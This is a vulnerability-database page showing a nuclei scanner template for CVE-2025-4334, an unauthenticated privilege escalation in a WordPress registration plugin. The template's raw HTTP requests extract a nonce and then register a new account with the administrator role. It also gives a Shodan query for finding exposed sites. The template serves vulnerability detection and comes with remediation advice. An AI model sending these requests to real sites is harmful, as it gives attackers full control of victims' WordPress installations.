Lucene search
K

Simple User Registration <= 6.3 - Unauthenticated Privilege Escalation

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 23 Views

Critical vulnerability in Simple User Registration ≤ 6.3 allows unauthenticated admin registration.

Related
Refs
Code
id: CVE-2025-4334

info:
  name: Simple User Registration <= 6.3 - Unauthenticated Privilege Escalation
  author: pussycat0x
  severity: critical
  description: |
    The Simple User Registration plugin ≤ 6.3 is vulnerable to privilege escalation. It lacks proper restrictions on user meta values during registration. Unauthenticated attackers can exploit this to register as administrators.
  reference:
    - https://github.com/Nxploited/CVE-2025-4334
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-4334
    epss-score: 0.02055
    epss-percentile: 0.78947
    cwe-id: CWE-269
  impact: |
    An attacker can exploit this vulnerability to register with administrator privileges, gaining full control over the WordPress site.
  remediation: |
    Update the Simple User Registration plugin to a version newer than 6.3 when available, or remove the plugin if not essential.
  metadata:
    verified: true
    max-request: 2
    vendor: lifeisincredible
    product: simple-user-registration
    shodan-query: http.component:"wordpress" && http.html:"/wp-content/plugins/simple-user-registration/"
  tags: cve,cve2025,wordpress,wp-plugin,wp,intrusive,plugin,simple-user-registration,vuln


variables:
  username: "{{randstr}}"
  email: "{{randstr}}@{{rand_base(5)}}.com"
  password: "{{to_lower(rand_text_alpha(8))}}"

http:
  - raw:
      - |
        GET /register/ HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-Requested-With: XMLHttpRequest
        Content-Length: 417

        action=wpr_submit_form&wpr_form_id={{wpr_form_id}}&wpr_nonce={{wpr_nonce}}&_wp_http_referer=%2Fregister%2F&wpr%5Bwp_field%5D%5Buser_login%5D={{username}}&wpr%5Bwp_field%5D%5Bfirst_name%5D=first{{username}}&wpr%5Bwp_field%5D%5Blast_name%5D=last{{username}}&wpr%5Bwp_field%5D%5Buser_email%5D={{email}}&wpr%5Bwp_field%5D%5Bpassword%5D={{password}}&wpr%5Bwp_field%5D%5Bconfirm_password%5D={{password}}&wpr%5Bwp_field%5D%5Brole%5D=administrator

    matchers:
      - type: dsl
        dsl:
          - contains(body_1, "WPR Register")
          - contains(body_2, "user_id")
          - contains(body_2, "Registration Done")
        condition: and

    extractors:
      - type: regex
        internal: true
        group: 1
        name: wpr_nonce
        part: body
        regex:
          - 'name="wpr_nonce" value="([a-f0-9]+)"'

      - type: regex
        internal: true
        group: 1
        name: wpr_form_id
        part: body
        regex:
          - 'name="wpr_form_id" value="([0-9]+)"'
# digest: 490a0046304402206c052c83933c2db729ccee4a47ca1ebf3369f77ce289a18270043a791907ff1b02207518a03747c96c1040752657534df406551bcd7f425532abf1bfa4c0b53cc2ad:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.19.8
EPSS0.02055
SSVC
23